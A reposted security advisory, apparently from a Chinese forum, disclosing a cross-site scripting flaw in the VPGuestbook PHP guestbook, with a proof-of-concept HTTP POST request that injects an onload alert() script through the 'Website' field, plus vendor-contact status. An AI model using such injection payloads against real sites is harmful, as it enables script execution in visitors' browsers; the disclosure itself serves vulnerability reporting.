[转载]VPGuestbook跨站脚本攻击(XSS)以及测试方法
信息来源:contropotere.altervista.org#1:. Background
[about]
A cool guestbook with many options such as : language files, smileys, ipban option, word filter, rating system, administration ... and more ... -Hotscripts.com-
[/about]
#2:. The Bug
The bug is caused by an insufficient filtering of user submitted input.A malicious user, could insert javascript code in the "Website" field when signing the guestbook.
#3:. PoC
[http post request]
POST [url]http://127.0.0.1/vpguestbook/index.php[/url] HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.7.10) Gecko/20050717 Firefox/1.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: [url]http://127.0.0.1/vpguestbook/index.php[/url]
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
nom=KingOfSka&email=&url=%3CBODY+ONLOAD%3Dalert%28%27XSS%27%29%3E¬e=1&message=asdas&submit=Send
[/http post request]
#4:. Vendor Status / Patch :
Vendor contacted on 17/10 with e-mail, no response received yet.
#5:.
[url]http://contropotere.altervista.org/mercury/index.php?a=forum&f=34[/url] - Cpc Patching Forum , here you can ask for an unofficial patch
[url]http://contropotere.altervista.org/limbo/index.php/option/wrapper/Itemid/47[/url] - Url, Bas64 and Hex Encoder/Decoder
页:
[1]